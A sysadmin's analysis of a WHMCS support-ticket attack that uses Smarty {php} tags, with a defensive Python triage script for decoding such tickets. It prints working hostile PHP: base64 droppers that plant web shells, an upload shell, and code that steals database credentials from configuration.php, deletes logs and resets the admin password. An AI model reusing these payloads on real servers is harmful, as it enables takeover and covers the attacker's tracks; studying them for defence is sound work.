The encoded samples below were submitted via support ticket to a WHMCS installation in an attempt to exploit a weakness. The `{php}...{/php}` wrapper is a Smarty template tag: if the ticket text is later rendered through the template engine with that tag enabled, the PHP inside it runs on the server with the web server's privileges.
The code below is for educational purposes only. As a sysadmin, it's easier to defend against an attack you fully understand than to be kept in the dark by a software vendor whose only response to the issue is "We've fixed it".
{php}eval(base64_decode('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'));{/php}
That encoded string decodes to:
$code = base64_decode("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"); // inner payload (a second base64 layer, omitted here)
$fo = fopen("templates_c/red.php","w");   // templates_c is Smarty's compiled-template directory, which the web server must be able to write to
fwrite($fo,$code);                        // drop the decoded PHP there as red.php, reachable over HTTP
I also got this message from the same person:
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    // Copies the uploaded temp file into the script's working directory under the client-supplied filename:
    // a minimal dropper for a full web shell, with no check on the name or extension
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; } // "SUKSES": Indonesian for "success"
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; } // "GAGAL": Indonesian for "failed"
}
{php}eval(base64_decode ('JGNvZGUgPSBiYXNlNjRfZGVjb2RlDQoNCigiUEQ5d2FIQU5DbVZqYUc4Z0p6eG1iM0p0SUdGamRHbHZiajBpSWlCdFpYUm9iMlE5SW5CdmMzUWlJR1Z1WTNSNWNHVTlJbTExYkhScGNHRnlkQzltYjNKdExXUmhkR0VpS Uc1aGJXVTlJblZ3Ykc5aFpHVnlJaUJwWkQwaWRYQnNiMkZrWlhJaVBpYzdEUXBsWTJodklDYzhhVzV3ZFhRZ2RIbHdaDQoNClQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlX MWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzDQoNCmIyRmtJaUF wSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSQ0KDQorUEdKeVBpYzdJSDBOQ2dsbGJITmxJSHNnWldOb2J5QW5QR0krVlhCc2IyRmtJRWRCUjBGTUlDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DbjBOQ2o4KyIpOw0KJG1rZGlyID0gQG1rZ GlyICgia2luZyIsNzU1KTsNCiRmbyA9IGZvcGVuKCJraW5nL2tpbmcucGhwIiwidyIpOw0KZndyaXRlKCRmbywkY29kZSk7DQokdGV4dD1maWxlX2dldF9jb250ZW50cygiY29uZmlndXJhdGlvbi5waHAiKTsNCiR0ZXh0 PSBzdHJfcmVwbGFjZSgiPD9waHAiLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8PyIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIj8+IiwgIiIsICR0ZXh0KTsNCmV2YWwoJHRleHQpOw0 KJGRiPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZClvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvci BkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTsNC iRkZWxldGUyID0iREVMRVRFIGZyb20gdGJsYWN0aXZpdHlsb2cgIFdIRVJFIGlwYWRkcj0nIi4kX1NFUlZFUlsnUkVNT1RFX0FERFInXS4iJzsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZTIpOw0KJHNhID0gbXlzcWxfcXVl cnkoIlVQREFURSB0YmxhZG1pbnMgIFNFVCB1c2VybmFtZT0nYWRtaW4nIFdIRVJFIGlkID0nMSc7Iik7DQokc2ExID0gbXlzcWxfcXVlcnkoIlVQREFURSB0YmxhZG1pbnMgIFNFVCBwYXNzd29yZCA9ICc5OTc1NDEwNjY zM2Y5NGQzNTBkYjM0ZDU0OGQ2MDkxYScgV0hFUkUgd2hlcmUgaWQgPScxJzsiKTs='));{/php}Decoded to:
<?php
$code = base64_decode("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"); // the uploader shown above, base64-encoded
$mkdir = @mkdir("king",755);              // 755 here is decimal, not octal 0755, so the requested mode is actually 01363
$fo = fopen("king/king.php","w");         // drop the uploader as king/king.php under the web root
fwrite($fo,$code);
// Recover the database credentials: strip the PHP tags from WHMCS's configuration.php and eval() what is left,
// which defines $db_host, $db_username, $db_password and $db_name in this scope
$text = file_get_contents("configuration.php");
$text = str_replace("<?php", "", $text);
$text = str_replace("<?", "", $text);
$text = str_replace("?>", "", $text);
eval($text);
$db = mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
// Cover tracks: 0x257B7068707D25 is the hex-literal form of '%{php}%', so this deletes every ticket whose title contains a {php} tag
$delete = "DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
// ...and every activity-log row recorded for the attacker's own IP address
$delete2 = "DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);
// Take over admin account id 1: rename it to 'admin' and set its password to an attacker-chosen 32-hex-character (MD5-length) hash
$sa = mysql_query("UPDATE tbladmins SET username='admin' WHERE id ='1';");
$sa1 = mysql_query("UPDATE tbladmins SET password = '99754106633f94d350db34d548d6091a' WHERE where id ='1';"); // the doubled "WHERE where" is a syntax error in the sample as submitted, so this statement would fail
?>
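Both samples follow the same shape: a `{php}` tag around `eval(base64_decode(...))`, with a second base64 layer inside. As an added example that is not part of the original post or of WHMCS, here is a small Python triage script for ticket text that unwraps that pattern layer by layer, decodes the MySQL hex literal used to hide `%{php}%`, and reports what the decoded PHP would do. The sample ticket, file names and table names in it are constructed to mirror the two samples above; the indicator patterns are assumptions about what a dropper of this kind looks like, not a complete signature set.

```python
import base64
import re

# Added example (not from the original post): a triage helper for ticket text that
# unwraps the {php}eval(base64_decode(...)){/php} pattern shown above, layer by layer,
# and reports what the decoded PHP would do. File names, table names and the
# sample ticket below are constructed to mirror the samples on this page.

PHP_TAG_RE = re.compile(r"\{php\}(.*?)\{/php\}", re.DOTALL)
# base64_decode('...') or base64_decode ("..."); whitespace inside the literal is
# tolerated because mail clients and ticket forms wrap long lines.
B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+?)\1\s*\)")
HEX_LITERAL_RE = re.compile(r"\b0x([0-9A-Fa-f]+)\b")

# What a decoded layer is doing; group 1 (where present) is the interesting detail.
INDICATORS = {
    "writes file": re.compile(r"fopen\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"][wa]"),
    "copies upload": re.compile(r"copy\s*\(\s*\$_FILES"),
    "reads config": re.compile(r"file_get_contents\s*\(\s*['\"]([^'\"]*configuration\.php)['\"]"),
    "evals": re.compile(r"\beval\s*\("),
    "sql": re.compile(r"(?:DELETE\s+FROM|UPDATE)\s+(\w+)", re.IGNORECASE),
}


def decode_layers(snippet, max_depth=5):
    """Return the PHP hidden behind nested base64_decode() calls, outermost first."""
    layers = []
    frontier = [snippet]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for m in B64_CALL_RE.finditer(text):
                raw = re.sub(r"\s+", "", m.group(2))  # undo line wrapping
                try:
                    decoded = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
                except ValueError:  # not valid base64 after all; skip it
                    continue
                layers.append(decoded)
                next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def decode_hex_literals(text):
    """Decode MySQL hex literals such as 0x257B7068707D25 that hide string patterns."""
    out = []
    for m in HEX_LITERAL_RE.finditer(text):
        digits = m.group(1)
        if len(digits) % 2:
            continue  # odd length: not a byte string
        out.append(bytes.fromhex(digits).decode("utf-8", "replace"))
    return out


def triage(ticket_body):
    """Summarise every {php} block in a ticket: decoded layers, actions and hidden literals."""
    blocks = PHP_TAG_RE.findall(ticket_body)
    layers = []
    for block in blocks:
        layers.extend(decode_layers(block))
    findings = []
    for text in blocks + layers:
        for label, rx in INDICATORS.items():
            for m in rx.finditer(text):
                finding = (label, m.group(1) if m.groups() else "")
                if finding not in findings:
                    findings.append(finding)
    hex_literals = []
    for text in layers:
        hex_literals.extend(decode_hex_literals(text))
    return {"php_blocks": len(blocks), "layers": layers,
            "findings": findings, "hex_literals": hex_literals}


def _wrap(s, width=64):
    """Insert a space every `width` characters, as a wrapped mail body would."""
    return " ".join(s[i:i + width] for i in range(0, len(s), width))


# Constructed sample modelled on the two tickets above: an uploader nested inside a
# dropper that also reads configuration.php and touches tbltickets/tbladmins.
INNER_PHP = ("<?php if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) "
             "{ echo 'uploaded'; } ?>")
MIDDLE_PHP = (
    '$code = base64_decode("' + base64.b64encode(INNER_PHP.encode()).decode() + '");'
    '$fo = fopen("templates_c/red.php","w");fwrite($fo,$code);'
    '$text = file_get_contents("configuration.php");eval($text);'
    'mysql_query("DELETE from tbltickets WHERE title like 0x257B7068707D25;");'
    "mysql_query(\"UPDATE tbladmins SET username='admin' WHERE id ='1';\");"
)
SAMPLE_TICKET = ("Hi, my invoice link is broken {php}eval(base64_decode('"
                 + _wrap(base64.b64encode(MIDDLE_PHP.encode()).decode())
                 + "'));{/php} thanks")

if __name__ == "__main__":
    report = triage(SAMPLE_TICKET)
    print(f"{report['php_blocks']} {{php}} block(s), {len(report['layers'])} decoded layer(s)")
    for label, detail in report["findings"]:
        print(f"  {label}: {detail}")
    print("  hidden literals:", report["hex_literals"])
```

Run it against the raw ticket body (from the database or a mail export) before anyone opens the ticket in a browser. The findings list is then the checklist for the clean-up: the paths passed to fopen() are the files to look for on disk, and the tables named in the SQL (tbladmins in particular) are the rows to verify before trusting the admin area again.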